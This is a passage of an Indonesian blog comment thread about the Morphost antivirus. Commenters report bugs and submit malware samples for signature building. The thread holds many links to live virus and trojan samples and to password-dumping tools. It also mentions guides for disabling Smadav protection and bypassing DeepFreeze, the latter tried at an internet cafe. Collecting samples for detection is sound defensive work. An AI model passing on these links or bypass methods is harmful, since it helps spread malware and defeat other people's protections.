      dulu sebelum morphost expert di rilis database morphost juga sudah 1000 lebih. ada kok yg bisa di banggakan dari morphost, yaitu heuristic terhadap file yg terinfeksi, dan ini masih jarang di punya AV lokal lain. jadi biar 600-an pun, tak masalah, sebetulnya bisa mendetek lebih dr segitu, malah lebih banyak…

      untuk yg vx-netlux itu, thanks ya. hehe… saya sudah tahu sobat, sy juga sering download disitu 🙂.. sering-sering mampir yoo.. 🙂

    • Morphic said

      hmm.
      begini sob.
      600 itu main virus (virus utama)
      belum dihitung varian dan target heuristiknya.

      jadi kalo totalnya bisa mencapai ribuan.

      thanks sudah mau mengupload ya…

  100. arip said

    mas morphic, morphost yg sekarang belum ada exception listnya ya? soalnya program buatan saya kena detect or false alarm.. klo ada caranya gmn?

  101. Maxx said

    Ada yang bisa bantuin nggak, gimana caranya ngambil string checksum dari crc32?? Ato morphost punya string checksum virus nggak? bagi2 donk, lagi bikin AV nih…😀

  102. priyo wicaksono said

    mau tanya nie buat empunya morphost,,

    kenapa nie AV morphost ke deteck malware ama AVG,,,
    Padahal AV zmadup lolos,,,

    mohon di perbaiki bugnya yia,,

    thx

  103. coe88 said

    pic aq ada sedikit sampel virus nih. Kayanya belum terdetek ma morphost.
    http://fsbozer.com/virus.zip

    yang laennya menyusul…
    ok

  104. Dark said

    ni AV boleh juga……kerenlah, tapi sayangnya kenapa ga bisa bersihin virus yg nyegah wat DL update AV.
    ada solusi ga bang ?

    • Morphic said

      hmm..
      bisa kasih contoh / sampel virusnya?

      terima kasih…

      • dark said

        klo sampel virus w ga tau gimana ngambilnya soalnya w ga tau apa2 soal ini. ngambil sample virusnya gimana ?
        namanya xsvr85.exe@ ,w dah scan pake symantec n avira nama file itu yg terus muncul tapi ga bisa di bersihin cuma dikarantina aja. trus ada lagi yg lain dengan extensi *.exe@
        eh……btw dari pengalaman bro morph itu virus apa ga sih ?

        • Morphic said

          biasanya kita ngambil file virus nya dari alamat yang sudah dideteksi oleh symantect ato avira yg kamu pakai.
          Kalau dikarantina berarti file itu dipindahkan, jadi file virusnya sudah ada di pengawasan antivirus kamu.

          kalo menurut pengalamanku:
          1. kalo komputermu itu masih baru, berarti file yg terdeteksi itu false detect apalagi cuma satu file yg terdeteksi.
          2. kalopun itu virus biasanya yg suka berdiri sendiri dan memakai filename aneh biasa disebut trojan Agent.

        • yudha said

          cari file itu ada dimana tempatnya. bisa pakai search. lalu klo bisa copy paste di flash diskmu..

          baru kirim ke kami (morphostlab)

  105. Ardy Prologic said

    http://www.4shared.com/file/jTU4pLip/INIT.html

    http://www.4shared.com/file/ZgYe9PRA/_2__Momo_Geisha.html

    Di coba dulu mas..
    trus kasi koment yew..:)

  106. Rudi said

    mz morp, mo tanya dunk, saya pake morphost expert, saya coba di kompi saya, pas lagi scan virus, belum sampai 100% tau2 aplikasinya mati sendiri, kenapa ya?

    • Morphic said

      iya rud.
      itu masalah yg kami hadapi sekarang…

      di beberapa komputer, morphost nge-close sendiri saat menscanning…
      sebelum peluncuran antivirus ini kami udah uji coba pada 7 komputer…
      2 dari 7 komputer, Morphost-nya mati secara tiba-tiba…

  107. joe ouranos said

    bang phic…tolong post source code crc32 dan md5 dunk,,,,

  108. Ardy Prologic said

    Mas Morphic,, nih ada lagi sample nya..
    saya upload d morphic.4shared.com bulan juni..

    http://www.4shared.com/file/bptc0fIy/RunonceVarian.html
    http://www.4shared.com/file/U-V8aPGl/S-1-5-21-1482476501-1644491937.html
    http://www.4shared.com/file/sSL-ikHD/VIRwmicvrts.html
    http://www.4shared.com/file/aXVjP4Zf/RunonceInfected.html
    http://www.4shared.com/file/fUcByrOr/umdmgr.html

    kasih koment ya….:)

  109. Ardy Prologic said

    Pada Morphost terdeteksi sebagai Malware.IDB-1

    Tapi gx tw juga nih virus atw bukan..

    http://www.4shared.com/file/6ZaERWCg/MalwareIDB-1.html

    O ya,, mf klw salah t4 upload..
    koneksi lagi lelet soal nya…
    hehehe…:)

  110. nhanha said

    hallo morph. makasih antivirusnya..
    aku ada masalah nich.. saat scan drive c: belum selesai tapi morphost dah mati/ nutup sendiri. memenag sperti itu apa aku yang salah copy? makasih… sukses slalu

  111. Ardy Prologic said

    Mas Morphic,, kemaren laptop tmn sayadiserang Virus baru…

    Avira udah gx bisa d gunain,, gx tw jg knpa..
    coba pake’ ansav + smadav,, blum ap2 udah error alias gx bisa jalan…

    trus gw coba pk morphost database mei 2010,,
    ternyata banyak skali virus yg d tangkap..
    ttpi wktu pembersihan,, masih ad bbrpa virus yg gx bisa d clean maupun d karantina..
    ap krna virus nya blm ad d database morphost y???

    gw jg s4 ambil sample virus nya……

    recycle.{645FF040-5081-101B-9F08-00AA002F954E}.rar
    RVHOST.rar

  112. Ardy Prologic said

    Mas Morphic…

    kmren gw ad nyobain green registry..
    Tp wktu instal ulang kmrn lupa mindahin nya,, jd hilang dech..

    boleh gx minta link nya lagi,, biar bisa d pake’ lagi program nya….

  113. Poemqey said

    Ok, dewh ntar aku coba dunlud nie applikasi

  114. mrX said

    GOKIIIIIIIIIIIIIIIIIIIIIIIIILLLLLLLLLLLLLLLLLLLLLLLLLLLLL

  115. Ardy Prologic said

    Mas sharing kode biar bisa hilang kayak start up nya morphost dunk..
    gmna ya cara nya….

  116. Kholis Virologist said

    komennya rame bgtz, sampai2 koneksi internet q lambat… (memang lambat baca: 5kbps)

  117. MuamarKudo said

    Maju MORPHOST LAB !

  118. shafry said

    Mantap. semakin lama semakin maju

  119. deny26 said

    ijin download sample virus lokal untuk testing🙂
    makasi atas penyediaan sample virus lokalnya bro..

  120. dewa said

    Ebooknya keren…. nggak nyangka so simple matiin RTP nya Smadav. Morphic memang top… bisa rangsang AV maker lain lebih kreatif.

  121. desperados said

    pagi…semua..
    Phic… dikau pnya nama2 malcode/malware/malscript ini…

    SymbOS/Cabir.A,
    EPOC/Cabir.A,
    Worm.Symbian.Cabir.a,
    Caribe
    SymbOS.skulls,
    skulls.sis,
    Extenhded theme.sis
    CommWarrior worm v3.0. Matrix
    Locknut

    klo punya q minta dunk.. utk q buat signature-nya…

    • Morphic said

      dulu aku punya.
      tapi aku lupa dimana….
      kayaknya semuanya itu dipack dalam satu rar di koleksi virus kita.
      tapi aku benar-benar lupa rar yg mana…

      • desperados said

        ..ehhmm… ok q tunggu deh..
        kira2 tuh malcode/malware/malscript… memiliki uniquely string character gak yah..phic..
        (0,0)?

  122. MuamarKudo said

    phic, morphozine versi final dah kukirim ke emailmu…silakan dicek ya…

  123. Darryl said

    Abang morphic, aku mau tanya neh, kenapa Abang morphic menyediakan link download virus chantiqs padahal abang morphic sendiri bilang bahwa itu satu2nya virus yang bisa mematikan proteksi smadav???? bagaimana jika sang pen-download menyebarkan virus ini??? dengan mengkopi ke komputer lain??? mohon tanggapannya

    • Morphic said

      saya terpaksa menyediakan link download sebagai bahan bukti saja.

      dan saya sudah memperkirakan sebelumnya kalau bakal ada orang yang menyebarkan ke komputer lain.
      untuk itulah virus chantiqs ini sengaja dibuat untuk tidak menular…

      • Kalau menular itu resiko!!!! katanya Av paling eksis dan paling canggih itu bener bener bagus mana buktinya masih ada kelemahan nya kok…..Virus cantiq ini sampai disable kan dan tidak bisa dipakai lagi Av nya di komputer itu.

  124. dewa said

    Bro….
    1. Utk scan drive masih error. Selesai sih, tp muncul tulisan error yg sent dan don’t sent itu lho…
    2. Kan detek engine smadav sbg virus, tp nggak bisa hapus atau tuntaskan.
    3. McAfee versi 8.5i kedetek juga, autovolt.

    Maju terus Morphost…. jadi AV lokal terbaik !!!

    Thanks buat tutorialnya jebol deepfreeze. Pernah kepentok DF6, sampai reinstall, bikin gregetan…..tp skrg sdh bisa jebol … praktek di warnet ^_^

  125. muamarkudo said

    phic, emailku blm kaw baca ya ? eh, sorry sms mu yg kemarin nda ku balas, maklum…dah akhir bulan nih…hhe

  126. muamarkudo said

    Phic, ini Morphost Expert Plus versi Installer…
    Buat teman-teman silahkan mencoba, n tolong beri saran…

    Morphost Expert Plus — Installer.exe

    thx
    MuamarKudo

  127. kapten Morphic sample virus WILUJENG PILIH pilih aja yahhh:

    Sid-Virus.ASP.Silly.a
    http://www.ziddu.com/download/908588/Sid-Virus.ASP.Silly.a.zip.html

    Sid-Virus.BeOS.Kate
    http://www.ziddu.com/download/9085897/Sid-Virus.BeOS.Kate.zip.html

    Sid-Virus.KIX.Ixlam.a
    http://www.ziddu.com/download/9085918/Sid-Virus.KIX.Ixlam.a.zip.html

    Sid-PGWvirus
    http://www.ziddu.com/download/9085985/Sid-PGWvirus.zip.html

  128. muamarkudo said

    phic, usul nih..gimana kalo file msvbvm60.dll disertain aja di morphost… cz kadang banyak yg bingung kalo morphost ga bisa jalan karena file itu..

    eh, ebook yg tentang ‘how to be a good malware analyst’ kapan rilis nih?

  129. Rizki Gustian said

    gw baru make nih..

    tapi nih fitur nya bagus yah.. ada fitur perbaikan file doc😀

    mau gw tandingin ama AV lokal lain ah..😀

    minta ijin pake yah..

  130. yudha said

    @muamarkudo:
    sob, kita tukeran link yuk? nanti link blog mu q taroh di link blog q….

  131. yudha said

    Phic, RTP nya morphost kali ini menurutku Sudah lebih Ringan dibanding versi sebelumnya…. terasa sekali perbedaanya. Mantap kali!!

    Tapi aq nyoba beberapa sample,misalnya aq ada 5 viri, secara otomatis RTP nya mendetek tapi hanya 3, sementara pas q coba Scannernya kedetek semuanya.

    RTP dan Scannernya Beda Keakuratan/sensitivitynya phic ya?

    • Morphic said

      iya yudh.

      di pedoman Morphost pun udah kutulis kalo RTP-nya tidak seoptimal scanner-nya.

      ini gara-gara aku lebih fokus ke scanner-nya.
      jadinya Engine terbaru lupa kumasukkan ke RTP. hehehehe…

      Respon RTP sedikit kuperlambat menjadi seperempat sekon.
      jadi lebih ringan, tapi respon thdp virus tdk secepat kilat lah…

  132. adam said

    Bosz Mo saran Morphost kan udah rilis nih nah sekarang tinggal resmiin anggota morphoslabnya ….

  133. dewa said

    Bro….
    Yang beta tester juga masih belum stabil. Sering hilang sendiri. Seperti Expert. Tolong di perbaiki ya.
    Morphost deteksinya luar biasa, diatas AV lain. Sayang kan kalo belum stabil ????

    • Morphic said

      itu dia masalahnya…

      kami belum dapat solusinya….

      beberapa hari lagi kami rilis Morphost Expert plus-nya.
      perbaikan dari beta testednya…

      thanks laporannya…
      kami akan tanggapi.

  134. muamarkudo said

    bos, file .gif yg kau minta dah aku kirim ke emailmu… semoga bermanfaat..

  135. Darryl said

    Bang Morphic, aku cuma mau kasih saran neh..
    Kemaren baru download Morphost yang Expert, hasil sementara setelah aku bandingkan dengan AV lokal terbaik saat ini menurutku(smadav):
    1. Morphost ngga kalah sama smadav dalam mendeteksi virus2 lokal
    2. Morphost sama ringannya seperti smadav, yang penting lagi adalah portable alias ngga perlu install
    3. Morphost juga memiliki kemampuan mengembalikan registry, memunculkan option yang disembunyikan dengan suskses olah virus lokal(ciri utama)persis smadav bukan???
    4. Morphost lebih sensitif daripada smadav maupun AV2 lainnya(kompiku dengan smadav adalah 0 ekor virus sedangkan dengan Morphost ada 15 ekor ding)

    Sekarang sedikit saran buat bang Morphic:
    1. Interface Morphost agak kasar, mungkin di versi selanjutnya bisa dibuat lebih user friendly(sekedar saran, mau dipertahankan juga ngga apa2 karena tiap antivirus biarlah punya ciri khas sendiri seperti ANSAV yang bisa ganti skin dengan download di situs resminya dan smadav pro yang bisa ganti warna)
    2. Tambahan bahasa asing mungkin seperti bahasa Inggris(ato seperti ANSAV ada bahasa Jawa, mungkin Melayu juga ato Chinese????hehehehehe(>.<))
    3. Mungkin database Morphost belum memiliki gudang virus yang banyak(ngga seperti PCMAV ato smadav yang dah cukup sekampung)vrsi selanjutnya aku kira bisa ditambah, pengguna Morphost kan juga bisa submit virus baru kan???
    4. Tambahan opsi pause saat scanning, bebrapa kasus dimana kita masih bekerja di komputer sementara antivirus menjelajah jerohan komputer kita, kadang bisa hang ato lamaaaaaa banget buat loading, pause bisa sedikit membantu(kan dasar komputer kan multi tasking, jangan sampe kinerja komputer terganggu oleh kerja antivirus, ato setidaknya running background scanning lah)
    5. Bagaimana jika Real Time Protection Morphost digabung seperti AV pada umumnya(tinggal disertakan opsi mengaktifkan ato tidak bagi para pengguna seperti yang sudah ada di Morphost Expert -jujur aku baru donload yang versi ini dan baru mencoba kemarin malam-)

    Mungkin itu dulu dari saya, semoga tidak menyinggung abang2 yang ada di belakang Morphost….

    • satryacode said

      terima kasih darryl..
      smoga si morphic terima masukkan mu yg mantep ini…
      hehehhe.

      soal database,
      semua struktur dan checksum sudah di ganti,
      jadi checksum yg lama sudah tidak berfungsi lg,
      olh krn itu, morphic membuat ulang utk cj=hecksum itu dan harus mendownload dan mencari ulang semua virus yg sudah maupun yg belum ONLINE ,,,

      salam,
      satryacode
      http://satryablog.us.to

      • Darryl said

        Aku senang ada AV lokal yang bisa lebih sensitif daripada smadav kenapa??? itu karena aku habis baca blog bang Morphic yang bilang bahwa smad-lock tidak lagi aman apalagi dia sendiri yang nemu cara buat mbobol smad-lock(aku perna ngalami kasus dimana flash disk-ku di-infeksi virus yang kayaknya produk lokal, nah sebelumnya flash disk-ku udah dikunci dengan smad-lock, aku yakin dan kompi tempat aku nyolok ngga ada AV sama sekali, nah flash disk-ku kayaknya kemasukan virus lokal, sampe folder smad-lock itu hilang, sebagai gantinya, flash diskku aman(kayak tameng sekali pake gitu), setelah baca bahwa Morphii bisa membobol smad-lock, aku semakin takut kalau ngga lama lagi akan ada virus yang bisa membobol smad-lock)

        mohon bantuan abang2 sekalian, bagaimanapun, kita, baik aku maupun abang2 ingin kompi kita aman dari serangan virus lokal…

        semoga kasusku bisa membantu pola pikir abang dalam membenahi Morphost

        • Morphic said

          ini semua sebenarnya hak kekayaan intelektual…

          jadi siapa saja bebas sih “merusak”

          hehehee…

          kalo menurut aku, yah kita siap-siap saja melawan virus-virus yg seperti itu….

          thanks ya.

      • Darryl said

        oh ya ada satu lagi yang aku lupa mau tanya : Pro-Morphost itu apa sih, aku ngga begitu mengerti gunanya, apakah Morphost Expert jugda bisa menggunakan proses itu attau itu merupakan program terpisah sebelum Morphost Expert atau gimana???

        maklum baru kenal Morphost

        • Morphic said

          oh, itu untuk morphost yang lama.

          skarang pro-morphost tidak kami kembangkan lagi….

          sekarang Morphost yang baru sudah tidak butuh pro-morphost.
          setahu saya di morphost expert tidak disinggung tentang pro-morphost.

          intinya pro-morphost itu untuk morphost yg dulu…

    • Morphic said

      respon yg bagus dari daryl
      kalo sensitif yg kamu maksud adalah falsedetek, maka morphost expert plus akan mengurangi kemungkinan false detek

      1. kalo masalah interface, ya memang kami mau tetapin gitu aja…
      supaya kesannya gak meniru antivirus lokal lain…
      2. saran yang baik. (tentang multipel bahasa)
      kemarin kami juga mau buat yg gituan… tapi karena dah sempat bahasa indonesia, jadinya gak bisa multiple bahasa.
      mereka itu udah mereka rencanain dari awal.
      3.soal jumlah database,
      kami dah saring virus yang sudah punah dengan virus yang masih menyebar…
      4. kalo soal running background masih jadi masalah utama kita… hehehehe
      5. kalo soal berbagi real time protection masih tergolong rumit tuh…
      karena masing-masing antivirus maker tidak tahu parameter RTP antivirus lain…

      thanks

  136. yudha said

    ini Hasil scanning Morphost BETA di komp. ku , silahkan download ya phic….

    http://www.mediafire.com/?tdmhombmtit

  137. muamarkudo said

    Problem pertama :

    Morphost tak menampakkan ‘dirinya’ ..
    Hanya ada splash screen

    ini terjadi waktu aku coba di warnet… dulu juga pernah kaya gini…

  138. yudha said

    q coba dulu betanya….. nanti klo ada problem, aq beri tahu via sms ya phic..

    Semangat ya Morphic!!

    btw, yang di readme morphost itu fotomu ya, yang lagi posenya duduk?? lagi dimana tuh phic? latar belakangnya kyanya di gunung ya?

  139. Sodara sodara MORPHOSTLAB yah saya cintai!!!!!!! dan MORPHIC dan kawan-kawan yang saya hormati Maafkan saya saya titip absen soalnya ada urusan yang harus di selesaiin jadi aku titip absen yahh paling aku nongol lagi maret dan aku belum sempet cari virus soal nya aku lagi sibuk!!!!!!!

    Wasalamm!!!!!!

  140. yudha said

    Phic, klo nanti ada beta Tester lagi, aku mau ya jadi tester lagi…. gmana?

    nanti kita ngobrol via SMS an lagi…he..he…

  141. Rahmat said

    Om ada yg bilang virus ini akan terbit namana virus serviks download y

    http://www.4shared.com/file/106768914/e618a249/serviks.html

  142. FB.init(“532f18e17b6fe62bd5fd4d0f022b657c”);MORPHOST ANTIVIRUS on Facebook

    PHIC tempelin Fans MORPHOST ANtivirus on Fb ini Di pinggir Web MORPHOSTLAB tuh scriptnya!!!

  143. muamarkudo said

    Bos, ini ada beberapa software password recover/dumper, mungkin bisa dimasukkan dalam database Morphost sebagai -hackware-

    http://www.4shared.com/file/227927837/6d31cac/wirelesskeyview.html

    http://www.4shared.com/file/227927849/ae2aa76c/rdpv.html

    http://www.4shared.com/file/227923757/d4b76b40/chromepass.html

    http://www.4shared.com/file/227923761/16f99db6/dialupass.html

    http://www.4shared.com/file/227923760/61fead20/lsasecretsdump.html

    http://www.4shared.com/file/227923758/440876d1/lsasecretsview.html

    http://www.4shared.com/file/227925325/579a6bab/mailpv.html

    http://www.4shared.com/file/227925324/209d5b3d/mspass.html

    http://www.4shared.com/file/227925323/bef9ce9e/netpass.html

    http://www.4shared.com/file/227925319/75017443/passwordfox.html

    http://www.4shared.com/file/227927849/ae2aa76c/rdpv.html

    http://www.4shared.com/file/227927837/6d31cac/wirelesskeyview.html

    Semoga Bermanfaat.

  144. muamarkudo said

    bos, sorry belum bisa kirim hasil analisa lagi atau virus baru.

    lagi ada test nih.

    sorry kalau aku nda bisa banyak membantu.

  145. Rahmat said

    Om Morphic yg ganteng n pinter ada sampel virus nih pelajarin y

    Sample virus Vb.ABz.1
    http://www.4shared.com/file/95215572/fc7ffb70/Vbabz_1.html

    sample Virus TR/Renaz.207969 Trojan
    http://www.4shared.com/file/95210582/4c39178d/renaz207969.html

    Sample virus TR/agent 273920. c Trojan
    http://www.4shared.com/file/95210492/54e04cfb/agent2073930.html

    Sample virus Sality.y
    http://www.4shared.com/file/95211911/b554637f/Salityy.html

  146. Rahmat said

    WAAAAAAH YG INI LEBIH BANYAK SAMPELNYA. Karena banyak saya ksh tau situsnya aja y ok

    http://ipnh.netfast.org/index.php?page=virsamples.htm

  147. Rahmat said

    Om Morphic yg ganteng n pinter ada sampel virus nih pelajarin y

    Sample virus Vb.ABz.1
    http://www.4shared.com/file/95215572/fc7ffb70/Vbabz_1.html

    sample Virus TR/Renaz.207969 Trojan
    http://www.4shared.com/file/95210582/4c39178d/renaz207969.html

    Sample virus TR/agent 273920. c Trojan
    http://www.4shared.com/file/95210492/54e04cfb/agent2073930.html

    Sample virus Sality.y
    http://www.4shared.com/file/95211911/b554637f/Salityy.html

  148. maxx said

    Phic, kenapa ya pas kita ngembaliin virus yang di karantina morphost..ke folder asalnya ataupun ke folder lain. Virus di folder karantina masih ada…apa ada yang salah??

  149. yudha said

    Akhirnya….. setelah sekian lama kuliah, kemarin tgl 20 februari aq di sidang Tugas Akhir, akhirnya Lulus juga…. SENANG Nya..

    Thanks semuanya buat Morphostlab Team…

    thanks jg buat Morphic..

    sukses slalu buat Kalian Semua ya…. SEMANGAT..!!

  150. Rahmat said

    Om Morphic ku dah upload virus Gelas ma FakeFolder ku jga msh bru tpi suka hal2 berbau virus n hacking na yg mo kutanyain kyk Gelas scan pke Morphosbsa dikandangin di folder lain tpi kok file aslinya g ilang y. TQ n mohon bimbingannya

  151. Sid Revi said

    Sample virus phic………..

    SID-TheLegendOfAAng
    http://www.ziddu.com/downloadlink/8651794/SID-TheLegendOfAAng.zip

    SID-Worm.Win32.Burn.a
    http://www.ziddu.com/downloadlink/8651793/SID-Worm.Win32.Burn.a.zip

    SID-XFLY
    http://www.ziddu.com/downloadlink/8651792/SID-XFLY.rar

    SID-Worm.Win32.Autooter.a
    http://www.ziddu.com/downloadlink/8651791/SID-Worm.Win32.Autooter.a.zip

    SID-Worm.Win32.BlueCode
    http://www.ziddu.com/downloadlink/8651790/SID-Worm.Win32.BlueCode.zip

    SID-Worm.Win32.Boohoo
    http://www.ziddu.com/downloadlink/8651789/SID-Worm.Win32.Boohoo.zip

    SID-Nukers
    http://www.ziddu.com/downloadlink/8651716/SID-Nukers.zip

    SID-Worm.Win32.Alphx.b
    http://www.ziddu.com/downloadlink/8651715/SID-Worm.Win32.Alphx.b.zip

    SID-Worm.Win32.Alcaul
    http://www.ziddu.com/downloadlink/8651714/SID-Worm.Win32.Alcaul.zip

    SID-Worm.Win32.Ailis.a
    http://www.ziddu.com/downloadlink/8651713/SID-Worm.Win32.Ailis.a.zip

    SIDWorm.Win32.Autooter.a
    http://www.ziddu.com/downloadlink/8651712/SIDWorm.Win32.Autooter.a.zip

    SID-Worm.Win32.AimVen
    http://www.ziddu.com/downloadlink/8651711/SID-Worm.Win32.AimVen.zip

    SID-SOFTBG
    http://www.ziddu.com/downloadlink/8651710/SID-SOFTBG.zip

    SID-RecycleVrz
    http://www.ziddu.com/downloadlink/8651709/SID-RecycleVrz.rar

    SID_Worm.Win32.Bumerang
    http://www.ziddu.com/downloadlink/8651708/SID_Worm.Win32.Bumerang.zip

  152. revi said

    Phic sample virus……….

    Yuyun VBS harry potter
    http://www.ziddu.com/downloadlink/8651526/Yuyunvbs-Haripotter.zip

    SID-CACHE-49038502
    http://www.ziddu.com/downloadlink/8651592/SID-CACHE-49038502.zip

    SID_Worm.Win32.Bumerang
    http://www.ziddu.com/download/8651708/SID_Worm.Win32.Bumerang.zip.html

    SID-Worm.Win32.BlueCode
    http://www.ziddu.com/download/8651790/SID-Worm.Win32.BlueCode.zip.html

    SID-Worm.Win32.Boohoo
    http://www.ziddu.com/download/8651789/SID-Worm.Win32.Boohoo.zip.html

    SID-Worm.Win32.Burn.a
    http://www.ziddu.com/download/8651793/SID-Worm.Win32.Burn.a.zip.html

    SID-XFLY
    http://www.ziddu.com/download/8651792/SID-XFLY.rar.html

    SID-Worm.Win32.Autooter.a
    http://www.ziddu.com/download/8651791/SID-Worm.Win32.Autooter.a.zip.html

    SID-The Legend Of AAng
    http://www.ziddu.com/download/8651794/SID-TheLegendOfAAng.zip.html

    SID-Nukers
    http://www.ziddu.com/download/8651716/SID-Nukers.zip.html

    SID-Recycle Vrz

    http://www.ziddu.com/download/8651709/SID-RecycleVrz.rar.html

    SID-SOFT@BG
    http://www.ziddu.com/download/8651710/SID-SOFTBG.zip.html

    SID-Worm.Win32.Ailis.a
    http://www.ziddu.com/download/8651713/SID-Worm.Win32.Ailis.a.zip.html

    SID-Worm.Win32.AimVen
    http://www.ziddu.com/download/8651711/SID-Worm.Win32.AimVen.zip.html

    SID-Worm.Win32.Alcaul
    http://www.ziddu.com/download/8651714/SID-Worm.Win32.Alcaul.zip.html

    SID-Worm.Win32.Alphx.b
    http://www.ziddu.com/download/8651715/SID-Worm.Win32.Alphx.b.zip.html

  153. VirSpector said

    Banner Morphost Antivirus by VirSpector
    Silahkan dilihat di Morphorum
    Atau tepatnya disini: http://z6.invisionfree.com/MorphostLab_Medic/index.php?showtopic=572&st=0&#entry1451641

  154. Revi said

    PHIC ada yang nyalonin jadi Designer Group namanya “Gusti Danu” kata adam dia udah pengalaman masalh corel draw jadi gimana PHIC!!!!!!!!

  155. VirSpector said

    MORPHOST BANNER by VirSpector

    Script:


  156. Adam A&D said

    Morphic ni 4shared pnya ku
    http://www.4shared.com/dir/26111860/b74a4998/sharing.html

  157. SID Revi said

    http://www.facebook.com/pages/MORPHOST-ANTIVIRUS/310789236890 ni aku buat Grup morphost di facebook coba buka nanti teman ku adam yang promosiin nya jadi PHIC sayah minta:

    Alamat:
    Kota/Daerah:
    Kode Pos:
    Telepon:

    Tolong kirim ini secepat nya yah ke email ku fliyingducman@yahoo.com atau langsung di sini yahh PHIC!!!!! Grup nya Belum jelas Cuman bikin tadi sore HE_😀

    Wasalam SID!!!!!!!

  158. SID Revi said

    http://www.facebook.com/pages/MORPHOST-ANTIVIRUS/310789236890 PHIC coba lihat dulu aku buat Grup di facebook nanti nya teman ku adam yang promosikan MORPHOST ini lewat facebook dan ada furum nya di facebook lagi Coba phic buka dan satu lagi ini buat kumplitin informasi GRUP yahh phic kirimin ajah ke e-mail ku fliyingducman@yahoo.com ok Secepatnya!!!!

    Aku minta:

    alamat:
    kode pos:
    No TELEPON:
    KOTA/Daerah:

  159. Revi said

    PHIC aku buat Grup di Facebook nama nya MORPHOST AV Jadi saya minta Alamat:
    Kota/Daerah:
    Kode Pos:
    Telepon:

    Cukup segitu ajah yahh phic!!!!

  160. maxx said

    phic,mana janji mu buat bikin artikel tentang enkrip virus vbs. Dah lumayan lama juga di tunggu2, coz yang udah ada di blog ini kurang dipahami….
    Thx..

  161. Revi said

    Phic ini sample virus nya di http://revi-morphost.4shared.com sebagian sample virus lagi belum aku upload tunggu ajah yahh…. Tapi aku udah banyak nge upload di morphic.4shared.com tapi semuanya ilang gak tau kemana😀

    • Morphic said

      wah, makasih klo gitu ya…

      kita skrg giat-giatnya untuk bikin database maret.

      kalo gk salah udah 20 signature.

      • Revi said

        Laksanakan KApten baru 20 signature. Hebat donk kalu gitu nanti aku cari sample lagi di Warnet yahh HE_😀 Thanks yahh phic ama yudha yang baik jadikan aku di sini virus captor

  162. Adam said

    Morphic aku udah apload virus nya ke 4shared,,,,….

  163. Sid Revi said

    Morphic kenapa yahh aku nge upload Virus ke http://morphic.4shared.com kenapa suka ilang terus padahal aku udah upload virus itu aku upload virus nya ke Virus Bukan Buatan mu dan aku gak upload ke Folder nya……Tapi tetep virus nya suka ilang.

  164. Adam said

    Om morpich aku baru di grub ini jadi pandu aku ea…
    trus om pnya YM ga
    …?

  165. Gufron said

    Mo tanya
    Knp morphost bisa di kill dengan cara sederhana?
    saya membuat virus dengan VB 6.0 tapi knp source codenya yg kedetect sebagai virus, file compilannya ngga kedetect sama sekali, bahkan semua antivirus lokal ngga bisa detect virus saya.
    tolong dibenahin bugnya mas, salut lah sma morphost karna bisa detect source codenya.

  166. Alhen said

    Salam Morphost

    Saya Cuma Ingin Mengundang Kawan-kawan Morphost untuk bergabung di grup facebook Yaitu VB-BEBAS.
    http://www.facebook.com/group.php?gid=276567181630#!/group.php?gid=276567181630

  167. A.Hafid said

    Apa Morphost AV ini bisa digabung ma AV Impor (AVG, Avira, Avast, dll)?

    Terima Kasih

  168. dewa said

    Deteksinya bagus bro… tp belum selesai langsung ‘hilang’ sendiri tampilan Morphostnya. Di coba sampai 7x… yg 5x langsung hilang mendadak. Tolong bug nya di perbaiki ya bro…. Maju terus !!!! ^_^

    • Morphic said

      ya, kami usahakan untuk memperbaiki bug (yg sebetulnya saya belum tahu dimana letak kesalahannya)

      tapi solusinya ada bro…
      waktu mulai scanning, tekan “Skip Penghitungan File”

      thanks..

  169. Desperados said

    Mau Tanya.. gimana sih caranya… sintak utk buat. agar
    “ukuran file” bisa tampil saat di compile…
    thank’s before n later

  170. supernatural said

    bozzzzz, kalau leh usul nh. mirror downloadnya dari media fire. coalnya dari 4shared kadang putus putus. key

    • shafry said

      kan ud ad mirror nya di http:\\4869.50webs.com
      untuk morphost expert yang baru

    • Morphic said

      oo, itu usul yg baik.

      tapi sayangnya saya tidak sempat lagi (karena kesibukan lain) untuk membuat mirror download Morphost. Maaf.

      yang membuat mirror download database dari 50webs.com itu saja bukan saya yg buat…
      anak-anak Morphostlab ini juga yang buat…

      thanks ….

  171. Yahyan said

    Mas morphic punya facebook gak. Kalo punya namanya apa?

  172. Henri said

    Mas morphic,mas bilang AV Mhorphost,Smadav,Ansav paling bagus mana ??? hayo jujur ya jawabnya.Lalu mas sendiri pake apa ?

  173. Angga said

    bang phic,,, kalo posting sourcecode kasih penjelasan lengkapnya donk…
    tolong jelasin perintah perintah dari setiap code tersebut, agar yang masih newbie bisa cepet paham…

  174. dedihz said

    salam kenal ya phic,,:)

  175. xhadow said

    wah… blog sukses phic. semangat kau inspirasiku. terus update artikel phic!

  176. dewa said

    Salam kenal…
    Baru pake Morphost seminggu. OK banget, bisa detek yang AV lokal dan impor lain nggak bisa. Satu-satunya problem …begitu scan sudah 100%, muncul message error dari Microsoft yang ada Don’t Send dan Send itu lho. Di ulang lagi, sama juga. Padahal kan sekali scan hampir satu jam.
    Kira-kira kenapa itu ya ???

  177. maxx said

    Ni baru nemuin kesalahan Morphost, mungkin juga dah ada yg tahu. Tapi tolong diperbaikin biar tambah mantap, kemaren2 gw bikin virus vbs,trus iseng gw ganti namanya kek conficker (jwgkvsq.vmx) dan gw scan pake morphost eh ternyata terdeteksi sebagai conficker. Gimana ni, kok AVnya bisa salah deteksi??(sama kek AV sebelah yg iconnya segitiga hijau)

    • Morphic said

      wkwkwk…

      iya, memang.

      khusus yg itu, file tersebut udah masuk ke level FakeName atau nama tipuan di scanning Morphost.
      sama juga kayaknya double extension (juga tergabung dalam level FakeName Morphost).

      dan aku baru sadar juga dulu kalo AV sgitiga hijau juga melakukan hal yg sama.

      mengapa?
      demi keselamatan komputer pengguna juga.
      kemungkinannya hanya 1% ada orang yg mau membuat file dengan nama demikian. Dan sangat menguntungkan kalo si conficker cuma make nama file tersebut.

      Conficker termasuk malware cukup memusingkan, ditambah lagi malware ini udah bermutasi ke sana dan ke sini.
      untuk itulah FakeName digunakan supaya memutuskan rantai penyebaran malware ini untuk sementara….

      thanks.

    • maxx said

      Tapi kenapa AV lokal lain nggak ngelakuin hal yang sama (kek PC*AV+Clam*V,ANS*V dll)
      Klo orang yang msih awam soal yang beginian ntar malah AV mu yang dikira salah deteksi atau error, tapi iya juga sih karna conficker itu rumit. Good luck deh, mudah2an aja nemuin solusi yang lebih baik lagi….

      • Morphic said

        sama-sama maxx…

        soalnya aku juga udah buat filternya kok supaya false alarmnya makin kecil…
